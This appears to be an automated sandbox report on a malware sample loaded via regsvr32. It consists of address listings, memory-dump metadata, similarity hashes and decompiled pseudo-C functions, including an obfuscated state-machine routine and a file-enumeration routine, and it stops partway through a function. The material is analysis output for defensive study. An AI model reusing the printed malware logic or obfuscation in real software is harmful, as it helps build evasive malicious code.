                                                                                                                0x001a9fb9
                                                                                                                0x001a9fc1
                                                                                                                0x001a9fc6
                                                                                                                0x001a9fce
                                                                                                                0x001a9fd9
                                                                                                                0x001a9fe4
                                                                                                                0x001a9fef
                                                                                                                0x001a9ffa
                                                                                                                0x001aa002
                                                                                                                0x001aa00d
                                                                                                                0x001aa015
                                                                                                                0x001aa01d
                                                                                                                0x001aa022
                                                                                                                0x001aa02a
                                                                                                                0x001aa032
                                                                                                                0x001aa037
                                                                                                                0x001aa03f
                                                                                                                0x001aa047
                                                                                                                0x001aa052
                                                                                                                0x001aa05a
                                                                                                                0x001aa065
                                                                                                                0x001aa075
                                                                                                                0x001aa07a
                                                                                                                0x001aa081
                                                                                                                0x001aa08b
                                                                                                                0x001aa090
                                                                                                                0x001aa097
                                                                                                                0x001aa09b
                                                                                                                0x001aa0a3
                                                                                                                0x001aa0ab
                                                                                                                0x001aa0b6
                                                                                                                0x001aa0c1
                                                                                                                0x001aa0cc
                                                                                                                0x001aa0d4
                                                                                                                0x001aa0d9
                                                                                                                0x001aa0e1
                                                                                                                0x001aa0e9
                                                                                                                0x001aa0f1
                                                                                                                0x001aa0f9
                                                                                                                0x001aa101
                                                                                                                0x001aa109
                                                                                                                0x001aa111
                                                                                                                0x001aa11c
                                                                                                                0x001aa127
                                                                                                                0x001aa132
                                                                                                                0x001aa141
                                                                                                                0x001aa142
                                                                                                                0x001aa146
                                                                                                                0x001aa14e
                                                                                                                0x001aa156
                                                                                                                0x001aa163
                                                                                                                0x001aa16c
                                                                                                                0x001aa170
                                                                                                                0x001aa178
                                                                                                                0x001aa183
                                                                                                                0x001aa18e
                                                                                                                0x001aa199
                                                                                                                0x001aa1a9
                                                                                                                0x001aa1ae
                                                                                                                0x001aa1b2
                                                                                                                0x001aa1bd
                                                                                                                0x001aa1c4
                                                                                                                0x001aa1c8
                                                                                                                0x001aa1d0
                                                                                                                0x001aa1db
                                                                                                                0x001aa1e3
                                                                                                                0x001aa1ee
                                                                                                                0x001aa1f9
                                                                                                                0x001aa200
                                                                                                                0x001aa20b
                                                                                                                0x001aa218
                                                                                                                0x001aa21c
                                                                                                                0x001aa224
                                                                                                                0x001aa22c
                                                                                                                0x001aa234
                                                                                                                0x001aa23c
                                                                                                                0x001aa244
                                                                                                                0x001aa248
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa253
                                                                                                                0x001aa255
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aa25b
                                                                                                                0x001aa333
                                                                                                                0x001aa33a
                                                                                                                0x001aa33a
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa261
                                                                                                                0x001aa267
                                                                                                                0x001aa2ee
                                                                                                                0x001aa308
                                                                                                                0x001aa30a
                                                                                                                0x001aa30d
                                                                                                                0x001aa30f
                                                                                                                0x001aa315
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa250
                                                                                                                0x001aa26d
                                                                                                                0x001aa273
                                                                                                                0x001aa2cb
                                                                                                                0x001aa2d1
                                                                                                                0x001aa2dc
                                                                                                                0x001aa2dc
                                                                                                                0x001aa2df
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2d9
                                                                                                                0x001aa2e1
                                                                                                                0x001aa2e4
                                                                                                                0x00000000
                                                                                                                0x001aa275
                                                                                                                0x001aa27b
                                                                                                                0x001aa4c5
                                                                                                                0x001aa281
                                                                                                                0x001aa287
                                                                                                                0x00000000
                                                                                                                0x001aa28d
                                                                                                                0x001aa2bc
                                                                                                                0x001aa2c1
                                                                                                                0x001aa2c4
                                                                                                                0x001aa250
                                                                                                                0x001aa250
                                                                                                                0x001aa252
                                                                                                                0x00000000
                                                                                                                0x001aa252
                                                                                                                0x001aa250
                                                                                                                0x001aa287
                                                                                                                0x001aa27b
                                                                                                                0x001aa273
                                                                                                                0x001aa267
                                                                                                                0x001aa4cc
                                                                                                                0x001aa4dd
                                                                                                                0x001aa4dd
                                                                                                                0x001aa344
                                                                                                                0x001aa34a
                                                                                                                0x001aa405
                                                                                                                0x001aa409
                                                                                                                0x001aa40e
                                                                                                                0x001aa41d
                                                                                                                0x001aa440
                                                                                                                0x001aa452
                                                                                                                0x001aa458
                                                                                                                0x001aa471
                                                                                                                0x001aa491
                                                                                                                0x001aa496
                                                                                                                0x001aa499
                                                                                                                0x001aa49e
                                                                                                                0x001aa4a5
                                                                                                                0x00000000
                                                                                                                0x001aa350
                                                                                                                0x001aa350
                                                                                                                0x001aa356
                                                                                                                0x001aa3f6
                                                                                                                0x001aa3fb
                                                                                                                0x001aa3fe
                                                                                                                0x00000000
                                                                                                                0x001aa35c
                                                                                                                0x001aa35c
                                                                                                                0x001aa362
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: pa$$<$%$/v$3})$D.|$RDv$`/D${C$($@
                                                                                                                • API String ID: 1725840886-3390780285
                                                                                                                • Opcode ID: ee6712fe2374403ed138b28623e957e4654de3edba437386c5cdf8d324fa88f1
                                                                                                                • Instruction ID: 9f71d3e08c29d2b5abd9748930d180933410ba88240a7b63820ef7a7650d8537
                                                                                                                • Opcode Fuzzy Hash: ee6712fe2374403ed138b28623e957e4654de3edba437386c5cdf8d324fa88f1
                                                                                                                • Instruction Fuzzy Hash: 482213715083809FD368CF65C94AA9BFBE1FBC5718F508A1DE2DA86260D7B18949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E1002A9C8(void* __ecx, void* __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t19;
                                                                                                                				void* _t26;
                                                                                                                				void* _t28;
                                                                                                                				void* _t39;
                                                                                                                				long _t43;
                                                                                                                				CHAR* _t46;
                                                                                                                				void* _t47;
                                                                                                                				void* _t57;
                                                                                                                				void* _t59;
                                                                                                                				void* _t61;
                                                                                                                				void* _t64;
                                                                                                                				signed int _t66;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t57 = __edx;
                                                                                                                				_t66 = _t68 - 0x90;
                                                                                                                				_t19 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				 *(_t66 + 0x8c) = _t19 ^ _t66;
                                                                                                                				_t46 =  *(_t66 + 0x98);
                                                                                                                				_t59 = __ecx;
                                                                                                                				E1002A585(__ecx);
                                                                                                                				_t75 = _t46;
                                                                                                                				if(_t46 != 0) {
                                                                                                                					__eflags = lstrlenA(_t46) - 0x104;
                                                                                                                					if(__eflags < 0) {
                                                                                                                						goto L2;
                                                                                                                					} else {
                                                                                                                						_push(0xa0);
                                                                                                                						goto L6;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t46 = 0x1005c750;
                                                                                                                					L2:
                                                                                                                					 *(_t59 + 8) = E100160BC(_t75, 0x140);
                                                                                                                					E100202D5(_t46, _t57, _t59, 0x104, _t66, _t23 + 0x2c, 0x104, _t46);
                                                                                                                					_t26 = FindFirstFileA(_t46,  *(_t59 + 8));
                                                                                                                					 *(_t59 + 0xc) = _t26;
                                                                                                                					if(_t26 != 0xffffffff) {
                                                                                                                						_t49 = _t59 + 0x10;
                                                                                                                						 *((intOrPtr*)(_t66 - 0x7c)) = _t59 + 0x10;
                                                                                                                						 *((intOrPtr*)(_t66 - 0x78)) = E1001ADAB(_t46, _t59 + 0x10, 0x104);
                                                                                                                						_t28 = E10041365(_t59 + 0x10, _t57, _t27, _t46, 0x104);
                                                                                                                						__eflags = _t28;
                                                                                                                						if(_t28 != 0) {
                                                                                                                							E1000B0F0(_t46, 0, 0x104, E1003F251(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), _t66 - 0x80, 3, _t66 - 0x74, 0x100, 0, 0, 0, 0));
                                                                                                                							E1000B0F0(_t46, 0, 0x104, E1003F472(_t49, _t57,  *((intOrPtr*)(_t66 - 0x78)), 0x104, _t66 - 0x80, _t66 - 0x74, 0, 0));
                                                                                                                							E10019B0F(_t46,  *((intOrPtr*)(_t66 - 0x7c)), 0, 0xffffffff);
                                                                                                                							_t39 = 1;
                                                                                                                							__eflags = 1;
                                                                                                                						} else {
                                                                                                                							E100015C0(_t46,  *((intOrPtr*)(_t66 - 0x7c)), _t59, _t28);
                                                                                                                							E1002A585(_t59);
                                                                                                                							_push(0x7b);
                                                                                                                							goto L6;
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t43 = GetLastError();
                                                                                                                						E1002A585(_t59);
                                                                                                                						_push(_t43);
                                                                                                                						L6:
                                                                                                                						SetLastError();
                                                                                                                						_t39 = 0;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_pop(_t61);
                                                                                                                				_pop(_t64);
                                                                                                                				_pop(_t47);
                                                                                                                				return E1003B437(_t39, _t47,  *(_t66 + 0x8c) ^ _t66, _t57, _t61, _t64);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000), ref: 1002AA20
                                                                                                                • GetLastError.KERNEL32(?,?,?,00000000), ref: 1002AA2E
                                                                                                                • lstrlenA.KERNEL32(?,?,?,00000000), ref: 1002AA41
                                                                                                                • SetLastError.KERNEL32(0000007B,00000000,?,?,00000104,?,?,?,00000000), ref: 1002AA50
                                                                                                                  • Part of subcall function 100160BC: _malloc.LIBCMT ref: 100160D6
                                                                                                                  • Part of subcall function 100202D5: _strcpy_s.LIBCMT ref: 100202E1
                                                                                                                • __fullpath.LIBCMT ref: 1002AA6C
                                                                                                                • __splitpath_s.LIBCMT ref: 1002AAA4
                                                                                                                • __makepath_s.LIBCMT ref: 1002AABD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$FileFindFirst__fullpath__makepath_s__splitpath_s_malloc_strcpy_slstrlen
                                                                                                                • String ID: *.*
                                                                                                                • API String ID: 23357613-438819550
                                                                                                                • Opcode ID: a1175ebd5c32ebfb7ecd3f7ddaccccb158d4b424fa1911c62c394038ba9268e1
                                                                                                                • Instruction ID: 1c295b4fe22b876962f74ccdec7c0b03fc35fe44166c1e575907a980132fd0c9
                                                                                                                • Opcode Fuzzy Hash: a1175ebd5c32ebfb7ecd3f7ddaccccb158d4b424fa1911c62c394038ba9268e1
                                                                                                                • Instruction Fuzzy Hash: 19310675A00218AFEB20DBB59C89EAFBBADEF49350F500529F515D3182DF34A584CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001B490E(intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				signed int _v40;
                                                                                                                				signed int _v44;
                                                                                                                				signed int _v48;
                                                                                                                				signed int _v52;
                                                                                                                				unsigned int _v56;
                                                                                                                				signed int _v60;
                                                                                                                				signed int _v64;
                                                                                                                				signed int _v68;
                                                                                                                				signed int _v72;
                                                                                                                				signed int _v76;
                                                                                                                				signed int _v80;
                                                                                                                				signed int _v84;
                                                                                                                				signed int _v88;
                                                                                                                				signed int _v92;
                                                                                                                				signed int _v96;
                                                                                                                				signed int _v100;
                                                                                                                				signed int _v104;
                                                                                                                				signed int _v108;
                                                                                                                				signed int _v112;
                                                                                                                				signed int _v116;
                                                                                                                				signed int _v120;
                                                                                                                				signed int _v124;
                                                                                                                				signed int _v128;
                                                                                                                				signed int _v132;
                                                                                                                				void* __ecx;
                                                                                                                				void* _t270;
                                                                                                                				intOrPtr _t297;
                                                                                                                				intOrPtr _t300;
                                                                                                                				void* _t301;
                                                                                                                				intOrPtr _t304;
                                                                                                                				void* _t305;
                                                                                                                				intOrPtr* _t306;
                                                                                                                				void* _t308;
                                                                                                                				intOrPtr _t329;
                                                                                                                				signed int _t332;
                                                                                                                				signed int _t333;
                                                                                                                				signed int _t334;
                                                                                                                				signed int _t335;
                                                                                                                				signed int _t336;
                                                                                                                				signed int _t337;
                                                                                                                				signed int* _t340;
                                                                                                                
                                                                                                                				_t331 = _a8;
                                                                                                                				_t306 = __edx;
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				E001AC98A(_t270);
                                                                                                                				_v16 = 0x1e1fdc;
                                                                                                                				_t340 =  &(( &_v132)[4]);
                                                                                                                				_v12 = 0x8f04d3;
                                                                                                                				_t329 = 0;
                                                                                                                				_v8 = 0;
                                                                                                                				_v84 = 0xaed5c8;
                                                                                                                				_t308 = 0x8bce7cc;
                                                                                                                				_t332 = 0x79;
                                                                                                                				_v84 = _v84 / _t332;
                                                                                                                				_v84 = _v84 + 0xffff7fac;
                                                                                                                				_v84 = _v84 ^ 0x0000f193;
                                                                                                                				_v104 = 0x520938;
                                                                                                                				_t18 =  &_v104; // 0x520938
                                                                                                                				_t333 = 0x67;
                                                                                                                				_v104 =  *_t18 * 0xf;
                                                                                                                				_v104 = _v104 + 0xfffff651;
                                                                                                                				_v104 = _v104 ^ 0x5b86bce7;
                                                                                                                				_v104 = _v104 ^ 0x5f483c7f;
                                                                                                                				_v116 = 0x1a3b30;
                                                                                                                				_v116 = _v116 >> 0xb;
                                                                                                                				_v116 = _v116 * 0x55;
                                                                                                                				_v116 = _v116 | 0xa4eb5901;
                                                                                                                				_v116 = _v116 ^ 0xa4eb5f93;
                                                                                                                				_v52 = 0x567239;
                                                                                                                				_v52 = _v52 << 0xc;
                                                                                                                				_v52 = _v52 ^ 0x67239000;
                                                                                                                				_v72 = 0xa293fa;
                                                                                                                				_v72 = _v72 ^ 0xce79500f;
                                                                                                                				_v72 = _v72 / _t333;
                                                                                                                				_v72 = _v72 ^ 0x02022236;
                                                                                                                				_v88 = 0x236cf;
                                                                                                                				_v88 = _v88 + 0xffffca86;
                                                                                                                				_t334 = 0x54;
                                                                                                                				_v88 = _v88 / _t334;
                                                                                                                				_v88 = _v88 >> 1;
                                                                                                                				_v88 = _v88 ^ 0x0000030e;
                                                                                                                				_v44 = 0x4b6b6d;
                                                                                                                				_v44 = _v44 | 0x304461e0;
                                                                                                                				_v44 = _v44 ^ 0x304f6bed;
                                                                                                                				_v120 = 0x38f127;
                                                                                                                				_v120 = _v120 + 0x83fc;
                                                                                                                				_v120 = _v120 * 0x57;
                                                                                                                				_v120 = _v120 + 0x8f0c;
                                                                                                                				_v120 = _v120 ^ 0x138a0fbb;
                                                                                                                				_v48 = 0x939707;
                                                                                                                				_v48 = _v48 + 0xd80e;
                                                                                                                				_v48 = _v48 ^ 0x009aaf7e;
                                                                                                                				_v124 = 0xa6467a;
                                                                                                                				_v124 = _v124 ^ 0x2ba836ff;
                                                                                                                				_v124 = _v124 + 0xffffdaa0;
                                                                                                                				_v124 = _v124 >> 7;
                                                                                                                				_v124 = _v124 ^ 0x005dc1c4;
                                                                                                                				_v76 = 0xbc38d0;
                                                                                                                				_v76 = _v76 << 0xe;
                                                                                                                				_t335 = 0x27;
                                                                                                                				_v76 = _v76 / _t335;
                                                                                                                				_v76 = _v76 ^ 0x00534322;
                                                                                                                				_v80 = 0xcc9200;
                                                                                                                				_v80 = _v80 >> 4;
                                                                                                                				_t336 = 0x2e;
                                                                                                                				_v80 = _v80 / _t336;
                                                                                                                				_v80 = _v80 ^ 0x000b77a0;
                                                                                                                				_v128 = 0x3290fd;
                                                                                                                				_v128 = _v128 << 7;
                                                                                                                				_v128 = _v128 << 1;
                                                                                                                				_v128 = _v128 ^ 0x5fbc701e;
                                                                                                                				_v128 = _v128 ^ 0x6d2b621b;
                                                                                                                				_v132 = 0x4b51fa;
                                                                                                                				_t337 = 0x56;
                                                                                                                				_v132 = _v132 * 0x78;
                                                                                                                				_v132 = _v132 >> 0xf;
                                                                                                                				_v132 = _v132 * 0x61;
                                                                                                                				_v132 = _v132 ^ 0x001ff7cd;
                                                                                                                				_v56 = 0xeac1c6;
                                                                                                                				_v56 = _v56 / _t337;
                                                                                                                				_v56 = _v56 >> 4;
                                                                                                                				_v56 = _v56 ^ 0x0001640d;
                                                                                                                				_v36 = 0xc3f93f;
                                                                                                                				_v36 = _v36 ^ 0x8d6f80a8;
                                                                                                                				_v36 = _v36 ^ 0x8dacb193;
                                                                                                                				_v40 = 0xd47fa6;
                                                                                                                				_v40 = _v40 + 0x168d;
                                                                                                                				_v40 = _v40 ^ 0x00d27183;
                                                                                                                				_v60 = 0x2e794b;
                                                                                                                				_v60 = _v60 << 0x10;
                                                                                                                				_v60 = _v60 ^ 0x97016c2a;
                                                                                                                				_v60 = _v60 ^ 0xee45846f;
                                                                                                                				_v92 = 0x91d655;
                                                                                                                				_v92 = _v92 | 0x227ad1d6;
                                                                                                                				_v92 = _v92 >> 9;
                                                                                                                				_v92 = _v92 + 0x59d1;
                                                                                                                				_v92 = _v92 ^ 0x0010831d;
                                                                                                                				_v96 = 0xc9cb77;
                                                                                                                				_v96 = _v96 * 6;
                                                                                                                				_v96 = _v96 * 0x17;
                                                                                                                				_v96 = _v96 + 0x73b0;
                                                                                                                				_v96 = _v96 ^ 0x6cc63849;
                                                                                                                				_v64 = 0xe0bf4e;
                                                                                                                				_v64 = _v64 + 0xc16d;
                                                                                                                				_v64 = _v64 | 0x3ce14c71;
                                                                                                                				_v64 = _v64 ^ 0x3cecb28c;
                                                                                                                				_v68 = 0xcade6d;
                                                                                                                				_v68 = _v68 + 0xe21a;
                                                                                                                				_v68 = _v68 >> 0xd;
                                                                                                                				_v68 = _v68 ^ 0x0007e842;
                                                                                                                				_v100 = 0xd90c03;
                                                                                                                				_v100 = _v100 * 0x15;
                                                                                                                				_v100 = _v100 + 0xffffe9c2;
                                                                                                                				_v100 = _v100 ^ 0x4cfeb3c8;
                                                                                                                				_v100 = _v100 ^ 0x5d3f778a;
                                                                                                                				_v108 = 0xccac7;
                                                                                                                				_v108 = _v108 << 0xb;
                                                                                                                				_v108 = _v108 | 0x6245e5f1;
                                                                                                                				_v108 = _v108 >> 9;
                                                                                                                				_v108 = _v108 ^ 0x003a500d;
                                                                                                                				_v112 = 0x2d4a41;
                                                                                                                				_v112 = _v112 + 0x7932;
                                                                                                                				_v112 = _v112 + 0x3672;
                                                                                                                				_v112 = _v112 >> 0xa;
                                                                                                                				_v112 = _v112 ^ 0x0009eacf;
                                                                                                                				_v28 = 0x1addad;
                                                                                                                				_v28 = _v28 | 0x511d8649;
                                                                                                                				_v28 = _v28 ^ 0x5117cbe1;
                                                                                                                				_v32 = 0x5c2216;
                                                                                                                				_v32 = _v32 * 0x5f;
                                                                                                                				_v32 = _v32 ^ 0x223a1567;
                                                                                                                				do {
                                                                                                                					while(_t308 != 0x1a66778) {
                                                                                                                						if(_t308 == 0x3bdc732) {
                                                                                                                							E001B17D2(_v28, _v32, _v24);
                                                                                                                						} else {
                                                                                                                							if(_t308 == 0x5d2c538) {
                                                                                                                								_t300 =  *0x1c4208; // 0x0
                                                                                                                								_t301 = E001B50D4(_v88,  &_v20,  *((intOrPtr*)(_t300 + 0x1c)), _v92, _v96, _t308, _v64,  *((intOrPtr*)(_t331 + 4)), _v68, _v100, _t308, _v24,  *_t331, _v104, _v108, _v112, _v20);
                                                                                                                								_t340 =  &(_t340[0xf]);
                                                                                                                								if(_t301 == _v44) {
                                                                                                                									 *_t306 = _v24;
                                                                                                                									_t329 = 1;
                                                                                                                									 *((intOrPtr*)(_t306 + 4)) = _v20;
                                                                                                                								} else {
                                                                                                                									_t308 = 0x3bdc732;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                							} else {
                                                                                                                								if(_t308 == 0x8bce7cc) {
                                                                                                                									_t308 = 0x93f6055;
                                                                                                                									continue;
                                                                                                                								} else {
                                                                                                                									if(_t308 != 0x93f6055) {
                                                                                                                										goto L14;
                                                                                                                									} else {
                                                                                                                										_t304 =  *0x1c4208; // 0x0
                                                                                                                										_t305 = E001B50D4(_v116,  &_v20,  *((intOrPtr*)(_t304 + 0x1c)), _v120, _v48, _t308, _v124,  *((intOrPtr*)(_t331 + 4)), _v76, _v80, _t308, _t329,  *_t331, _v84, _v128, _v132, _v52);
                                                                                                                										_t340 =  &(_t340[0xf]);
                                                                                                                										if(_t305 == _v72) {
                                                                                                                											_t308 = 0x1a66778;
                                                                                                                											continue;
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						L18:
                                                                                                                						return _t329;
                                                                                                                					}
                                                                                                                					_push(_t308);
                                                                                                                					_t297 = E001A303A(_t308, _v20);
                                                                                                                					_t340 =  &(_t340[3]);
                                                                                                                					_v24 = _t297;
                                                                                                                					if(_t297 == 0) {
                                                                                                                						_t308 = 0xb2eda1a;
                                                                                                                						goto L14;
                                                                                                                					} else {
                                                                                                                						_t308 = 0x5d2c538;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L18;
                                                                                                                					L14:
                                                                                                                				} while (_t308 != 0xb2eda1a);
                                                                                                                				goto L18;
                                                                                                                			}
                                                                                                                0x001b4acc
                                                                                                                0x001b4ad2
                                                                                                                0x001b4ada
                                                                                                                0x001b4ae2
                                                                                                                0x001b4aeb
                                                                                                                0x001b4af0
                                                                                                                0x001b4af6
                                                                                                                0x001b4afe
                                                                                                                0x001b4b06
                                                                                                                0x001b4b0b
                                                                                                                0x001b4b0f
                                                                                                                0x001b4b17
                                                                                                                0x001b4b1f
                                                                                                                0x001b4b2c
                                                                                                                0x001b4b2d
                                                                                                                0x001b4b31
                                                                                                                0x001b4b3b
                                                                                                                0x001b4b3f
                                                                                                                0x001b4b47
                                                                                                                0x001b4b55
                                                                                                                0x001b4b59
                                                                                                                0x001b4b5e
                                                                                                                0x001b4b66
                                                                                                                0x001b4b6e
                                                                                                                0x001b4b76
                                                                                                                0x001b4b7e
                                                                                                                0x001b4b86
                                                                                                                0x001b4b8e
                                                                                                                0x001b4b96
                                                                                                                0x001b4b9e
                                                                                                                0x001b4ba3
                                                                                                                0x001b4bab
                                                                                                                0x001b4bb3
                                                                                                                0x001b4bbb
                                                                                                                0x001b4bc3
                                                                                                                0x001b4bc8
                                                                                                                0x001b4bd0
                                                                                                                0x001b4bd8
                                                                                                                0x001b4be5
                                                                                                                0x001b4bee
                                                                                                                0x001b4bf2
                                                                                                                0x001b4bfa
                                                                                                                0x001b4c02
                                                                                                                0x001b4c0a
                                                                                                                0x001b4c12
                                                                                                                0x001b4c1a
                                                                                                                0x001b4c22
                                                                                                                0x001b4c2a
                                                                                                                0x001b4c32
                                                                                                                0x001b4c37
                                                                                                                0x001b4c3f
                                                                                                                0x001b4c4c
                                                                                                                0x001b4c50
                                                                                                                0x001b4c58
                                                                                                                0x001b4c60
                                                                                                                0x001b4c68
                                                                                                                0x001b4c70
                                                                                                                0x001b4c75
                                                                                                                0x001b4c7d
                                                                                                                0x001b4c82
                                                                                                                0x001b4c8a
                                                                                                                0x001b4c92
                                                                                                                0x001b4c9a
                                                                                                                0x001b4ca2
                                                                                                                0x001b4ca7
                                                                                                                0x001b4caf
                                                                                                                0x001b4cbc
                                                                                                                0x001b4cc4
                                                                                                                0x001b4ccc
                                                                                                                0x001b4cd9
                                                                                                                0x001b4cdd
                                                                                                                0x001b4ce5
                                                                                                                0x001b4ce5
                                                                                                                0x001b4cf3
                                                                                                                0x001b4e41
                                                                                                                0x001b4cf9
                                                                                                                0x001b4cff
                                                                                                                0x001b4db6
                                                                                                                0x001b4dc2
                                                                                                                0x001b4dc7
                                                                                                                0x001b4dce
                                                                                                                0x001b4e26
                                                                                                                0x001b4e28
                                                                                                                0x001b4e30
                                                                                                                0x001b4dd0
                                                                                                                0x001b4dd0
                                                                                                                0x00000000
                                                                                                                0x001b4dd0
                                                                                                                0x001b4d01
                                                                                                                0x001b4d07
                                                                                                                0x001b4d70
                                                                                                                0x00000000
                                                                                                                0x001b4d09
                                                                                                                0x001b4d0f
                                                                                                                0x00000000
                                                                                                                0x001b4d15
                                                                                                                0x001b4d4b
                                                                                                                0x001b4d57
                                                                                                                0x001b4d5c
                                                                                                                0x001b4d63
                                                                                                                0x001b4d69
                                                                                                                0x00000000
                                                                                                                0x001b4d69
                                                                                                                0x001b4d63
                                                                                                                0x001b4d0f
                                                                                                                0x001b4d07
                                                                                                                0x001b4cff
                                                                                                                0x001b4e47
                                                                                                                0x001b4e53
                                                                                                                0x001b4e53
                                                                                                                0x001b4dea
                                                                                                                0x001b4df3
                                                                                                                0x001b4df8
                                                                                                                0x001b4dfb
                                                                                                                0x001b4e01
                                                                                                                0x001b4e0d
                                                                                                                0x00000000
                                                                                                                0x001b4e03
                                                                                                                0x001b4e03
                                                                                                                0x00000000
                                                                                                                0x001b4e03
                                                                                                                0x00000000
                                                                                                                0x001b4e12
                                                                                                                0x001b4e12
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: P:$"CS$8R$9rV$AJ-$Ky.$U`?$U`?$qL<$r6$kO0
                                                                                                                • API String ID: 0-914005703
                                                                                                                • Opcode ID: efbd27ced40be660087bbe5ea393bdf4da003f5eca6297a75b3ff362c2c24a99
                                                                                                                • Instruction ID: 9ae216924df35b79274dae1217f2a5006b66fecc6fd395bd08690d7ca5642387
                                                                                                                • Opcode Fuzzy Hash: efbd27ced40be660087bbe5ea393bdf4da003f5eca6297a75b3ff362c2c24a99
                                                                                                                • Instruction Fuzzy Hash: B4D10F720093819FC368CF65C58A95BFBE1FBC4748F50891DF2A686261D7B6D948CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 97%
                                                                                                                			E001BD4AE() {
                                                                                                                				char _v520;
                                                                                                                				char _v1040;
                                                                                                                				char _v1044;
                                                                                                                				signed int _v1048;
                                                                                                                				signed int _v1052;
                                                                                                                				signed int _v1056;
                                                                                                                				signed int _v1060;
                                                                                                                				signed int _v1064;
                                                                                                                				signed int _v1068;
                                                                                                                				signed int _v1072;
                                                                                                                				signed int _v1076;
                                                                                                                				signed int _v1080;
                                                                                                                				signed int _v1084;
                                                                                                                				signed int _v1088;
                                                                                                                				signed int _v1092;
                                                                                                                				signed int _v1096;
                                                                                                                				signed int _v1100;
                                                                                                                				signed int _v1104;
                                                                                                                				signed int _v1108;
                                                                                                                				signed int _v1112;
                                                                                                                				signed int _v1116;
                                                                                                                				signed int _v1120;
                                                                                                                				signed int _v1124;
                                                                                                                				signed int _v1128;
                                                                                                                				signed int _v1132;
                                                                                                                				signed int _v1136;
                                                                                                                				signed int _v1140;
                                                                                                                				signed int _v1144;
                                                                                                                				signed int _v1148;
                                                                                                                				signed int _v1152;
                                                                                                                				signed int _v1156;
                                                                                                                				signed int _v1160;
                                                                                                                				signed int _v1164;
                                                                                                                				signed int _v1168;
                                                                                                                				signed int _v1172;
                                                                                                                				signed int _v1176;
                                                                                                                				signed int _v1180;
                                                                                                                				signed int _v1184;
                                                                                                                				signed int _v1188;
                                                                                                                				signed int _v1192;
                                                                                                                				signed int _v1196;
                                                                                                                				signed int _v1200;
                                                                                                                				signed int _v1204;
                                                                                                                				signed int _v1208;
                                                                                                                				signed int _v1212;
                                                                                                                				signed int _v1216;
                                                                                                                				signed int _v1220;
                                                                                                                				signed int _v1224;
                                                                                                                				signed int _v1228;
